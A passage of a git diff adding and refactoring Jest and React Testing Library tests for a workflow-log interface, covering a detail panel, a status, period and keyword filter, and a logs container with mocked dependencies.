+ ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 
'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..d7bec41224 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,527 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// ============================================================================ +// Tests +// 
============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) 
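+      // ('\\/' escapes the slash in Tailwind's 'group/clear' variant class;
+      // an unescaped '/' is invalid inside a CSS class selector.)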
+ + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class 
and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( 
+ , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx index 2ac9113a8e..e6d9f37949 100644 --- a/web/app/components/app/workflow-log/index.spec.tsx +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -1,105 +1,60 @@ -import React from 'react' +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + import { render, screen, waitFor } from '@testing-library/react' import userEvent from '@testing-library/user-event' import useSWR from 'swr' - -// Import real components for integration testing -import Logs from './index' -import type { ILogsProps, QueryParam } from './index' -import Filter, { TIME_PERIOD_MAPPING } from './filter' -import WorkflowAppLogList from './list' -import TriggerByDisplay from './trigger-by-display' -import DetailPanel from './detail' - -// Import types from source +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' import type { App, AppIconType, AppModeEnum } from '@/types/app' -import type { TriggerMetadata, WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' import { WorkflowRunTriggeredFrom } from '@/models/log' import { APP_PAGE_LIMIT } from '@/config' -import { Theme } from '@/types/app' -// Mock external dependencies only +// ============================================================================ +// Mocks +// ============================================================================ + jest.mock('swr') + jest.mock('ahooks', () => ({ - useDebounce: (value: T): T => value, -})) -jest.mock('@/service/log', () => ({ - fetchWorkflowLogs: jest.fn(), -})) -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) -jest.mock('@/context/app-context', () => ({ - useAppContext: () => ({ - userProfile: { - timezone: 'UTC', - }, - }), + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: 
(initial: boolean) => {
+    const setters = {
+      setTrue: jest.fn(),
+      setFalse: jest.fn(),
+      toggle: jest.fn(),
+    }
+    return [initial, setters] as const
+  },
 }))
-// Router mock with trackable push function
-const mockRouterPush = jest.fn()
 jest.mock('next/navigation', () => ({
   useRouter: () => ({
-    push: mockRouterPush,
+    push: jest.fn(),
   }),
 }))
-jest.mock('@/hooks/use-theme', () => ({
+jest.mock('next/link', () => ({
   __esModule: true,
-  default: () => ({ theme: Theme.light }),
-}))
-jest.mock('@/hooks/use-timestamp', () => ({
-  __esModule: true,
-  default: () => ({
-    formatTime: (timestamp: number, _format: string) => new Date(timestamp).toISOString(),
-  }),
-}))
-jest.mock('@/hooks/use-breakpoints', () => ({
-  __esModule: true,
-  default: () => 'pc',
-  MediaType: { mobile: 'mobile', pc: 'pc' },
+  default: ({ children, href }: { children: React.ReactNode; href: string }) => <a href={href}>{children}</a>,
 }))
-// Store mock with configurable appDetail
-let mockAppDetail: App | null = null
-jest.mock('@/app/components/app/store', () => ({
-  useStore: (selector: (state: { appDetail: App | null }) => App | null) => {
-    return selector({ appDetail: mockAppDetail })
-  },
-}))
-
-// Mock portal-based components (they need DOM portal which is complex in tests)
-let mockPortalOpen = false
-jest.mock('@/app/components/base/portal-to-follow-elem', () => ({
-  PortalToFollowElem: ({ children, open }: { children: React.ReactNode; open: boolean }) => {
-    mockPortalOpen = open
-    return
{children}
- }, - PortalToFollowElemTrigger: ({ children, onClick }: { children: React.ReactNode; onClick?: () => void }) => ( -
{children}
- ), - PortalToFollowElemContent: ({ children }: { children: React.ReactNode }) => ( - mockPortalOpen ?
{children}
: null - ), -})) - -// Mock Drawer for List component (uses headlessui Dialog) -jest.mock('@/app/components/base/drawer', () => ({ - __esModule: true, - default: ({ isOpen, onClose, children }: { isOpen: boolean; onClose: () => void; children: React.ReactNode }) => ( - isOpen ? ( -
- - {children} -
- ) : null - ), -})) - -// Mock only the complex workflow Run component - DetailPanel itself is tested with real code +// Mock the Run component to avoid complex dependencies jest.mock('@/app/components/workflow/run', () => ({ __esModule: true, default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( @@ -110,105 +65,58 @@ jest.mock('@/app/components/workflow/run', () => ({ ), })) -// Mock WorkflowContextProvider - provides context for Run component -jest.mock('@/app/components/workflow/context', () => ({ - WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( -
<div data-testid='workflow-context-provider'>{children}</div>
- ), -})) - -// Mock TooltipPlus - simple UI component -jest.mock('@/app/components/base/tooltip', () => ({ - __esModule: true, - default: ({ children, popupContent }: { children: React.ReactNode; popupContent: string }) => ( -
<div data-testid='tooltip' title={popupContent}>{children}</div>
- ), -})) - -// Mock base components that are difficult to render -jest.mock('@/app/components/app/log/empty-element', () => ({ - __esModule: true, - default: ({ appDetail }: { appDetail: App }) => ( -
<div data-testid='empty-element'>No logs for {appDetail.name}</div>
- ), -})) - -jest.mock('@/app/components/base/pagination', () => ({ - __esModule: true, - default: ({ - current, - onChange, - total, - limit, - onLimitChange, - }: { - current: number - onChange: (page: number) => void - total: number - limit: number - onLimitChange: (limit: number) => void - }) => ( -
- {current} - {total} - {limit} - - - -
- ), -})) - -jest.mock('@/app/components/base/loading', () => ({ - __esModule: true, - default: ({ type }: { type?: string }) => ( -
Loading...
- ), -})) - -// Mock amplitude tracking - with trackable function const mockTrackEvent = jest.fn() jest.mock('@/app/components/base/amplitude/utils', () => ({ trackEvent: (...args: unknown[]) => mockTrackEvent(...args), })) -// Mock workflow icons -jest.mock('@/app/components/base/icons/src/vender/workflow', () => ({ - Code: () => Code, - KnowledgeRetrieval: () => Knowledge, - Schedule: () => Schedule, - WebhookLine: () => Webhook, - WindowCursor: () => Window, +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), })) +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon jest.mock('@/app/components/workflow/block-icon', () => ({ __esModule: true, - default: ({ type, toolIcon }: { type: string; size?: string; toolIcon?: string }) => ( - BlockIcon - ), + default: () =>
<div data-testid='block-icon'>BlockIcon</div>
, })) -// Mock workflow types - must include all exports used by config/index.ts -jest.mock('@/app/components/workflow/types', () => ({ - BlockEnum: { - TriggerPlugin: 'trigger-plugin', - }, - InputVarType: { - textInput: 'text-input', - paragraph: 'paragraph', - select: 'select', - number: 'number', - checkbox: 'checkbox', - url: 'url', - files: 'files', - json: 'json', - jsonObject: 'json_object', - contexts: 'contexts', - iterator: 'iterator', - singleFile: 'file', - multiFiles: 'file-list', - loop: 'loop', - }, +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
<div data-testid='workflow-context-provider'>{children}</div>
+ ), })) const mockedUseSWR = useSWR as jest.MockedFunction @@ -237,7 +145,10 @@ const createMockApp = (overrides: Partial = {}): App => ({ app_model_config: {} as App['app_model_config'], created_at: Date.now(), updated_at: Date.now(), - site: {} as App['site'], + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], api_base_url: 'https://api.example.com', tags: [], access_mode: 'public_access' as App['access_mode'], @@ -274,7 +185,7 @@ const createMockWorkflowLog = (overrides: Partial = {}): W const createMockLogsResponse = ( data: WorkflowAppLogDetail[] = [], - total = 0, + total = data.length, ): WorkflowLogsResponse => ({ data, has_more: data.length < total, @@ -284,919 +195,23 @@ const createMockLogsResponse = ( }) // ============================================================================ -// Integration Tests for Logs (Main Component) +// Tests // ============================================================================ -describe('Workflow Log Module Integration Tests', () => { +describe('Logs Container', () => { const defaultProps: ILogsProps = { appDetail: createMockApp(), } beforeEach(() => { jest.clearAllMocks() - mockPortalOpen = false - mockAppDetail = createMockApp() - mockRouterPush.mockClear() - mockTrackEvent.mockClear() }) - // Tests for Logs container component - orchestrates Filter, List, Pagination, and Loading states - describe('Logs Container', () => { - describe('Rendering', () => { - it('should render title, subtitle, and filter component', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() - expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() - // Filter should render (has Chip components for status/period and Input for keyword) - expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() - }) - }) - - describe('Loading State', () => { - it('should show loading spinner when data is undefined', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: undefined, - mutate: jest.fn(), - isValidating: true, - isLoading: true, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('loading')).toBeInTheDocument() - expect(screen.queryByTestId('empty-element')).not.toBeInTheDocument() - }) - }) - - describe('Empty State', () => { - it('should show empty element when total is 0', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('empty-element')).toBeInTheDocument() - expect(screen.getByText(`No logs for ${defaultProps.appDetail.name}`)).toBeInTheDocument() - expect(screen.queryByTestId('pagination')).not.toBeInTheDocument() - }) - }) - - describe('List State with Data', () => { - it('should render log table when data exists', () => { - // Arrange - const mockLogs = [ - createMockWorkflowLog({ id: 'log-1' }), - createMockWorkflowLog({ id: 'log-2' }), - ] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 2), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByRole('table')).toBeInTheDocument() - // Check 
table headers - expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() - }) - - it('should show pagination when total exceeds APP_PAGE_LIMIT', () => { - // Arrange - const mockLogs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => - createMockWorkflowLog({ id: `log-${i}` }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, APP_PAGE_LIMIT + 10), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('pagination')).toBeInTheDocument() - expect(screen.getByTestId('total-items')).toHaveTextContent(String(APP_PAGE_LIMIT + 10)) - }) - - it('should not show pagination when total is within limit', () => { - // Arrange - const mockLogs = [createMockWorkflowLog()] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 1), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.queryByTestId('pagination')).not.toBeInTheDocument() - }) - }) - - describe('API Query Parameters', () => { - it('should call useSWR with correct URL containing app ID', () => { - // Arrange - const customApp = createMockApp({ id: 'custom-app-123' }) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(mockedUseSWR).toHaveBeenCalledWith( - expect.objectContaining({ - url: '/apps/custom-app-123/workflow-app-logs', - }), - expect.any(Function), - ) - }) - - it('should include pagination parameters in query', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(mockedUseSWR).toHaveBeenCalledWith( - expect.objectContaining({ - params: expect.objectContaining({ - page: 1, - detail: true, - limit: APP_PAGE_LIMIT, - }), - }), - expect.any(Function), - ) - }) - - it('should include date range when period is not all time', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - default period is '2' (last 7 days), should have date filters - const lastCall = mockedUseSWR.mock.calls[mockedUseSWR.mock.calls.length - 1] - const keyArg = lastCall?.[0] as { params?: Record } | undefined - expect(keyArg?.params).toHaveProperty('created_at__after') - expect(keyArg?.params).toHaveProperty('created_at__before') - }) - }) - - describe('Pagination Interactions', () => { - it('should update page when pagination changes', async () => { - // Arrange - const user = userEvent.setup() - const mockLogs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => - createMockWorkflowLog({ id: `log-${i}` }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, APP_PAGE_LIMIT + 10), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - await 